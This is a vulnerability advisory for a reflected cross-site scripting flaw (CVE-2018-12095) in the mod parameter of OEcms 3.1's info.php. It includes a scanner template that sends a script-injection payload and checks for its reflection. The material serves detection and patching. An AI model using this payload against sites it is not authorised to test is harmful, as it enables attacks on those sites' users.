CVE-2018-12095: OEcms 3.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: OEcms | POC: 已公开

漏洞描述

OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.

PoC代码[已公开]

id: CVE-2018-12095

info:
  name: OEcms 3.1 - Cross-Site Scripting
  author: LogicalHunter
  severity: medium
  description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44895
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
    - https://cxsecurity.com/issue/WLB-2018060092
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12095
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2018-12095
    cwe-id: CWE-79
    epss-score: 0.18458
    epss-percentile: 0.95011
    cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oecms_project
    product: oecms
  tags: cve2018,cve,xss,edb,oecms_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f44c1b4e5a5cb339ca133aba147273267db77ecc35954a98c3bcbabed75511cd0220407e2f8bb43e5ae34a8071622b6b7f57e6297e08d0eb38b3c3cb8d6eb94bd661:922c64590222798bb761d5b6d8e72950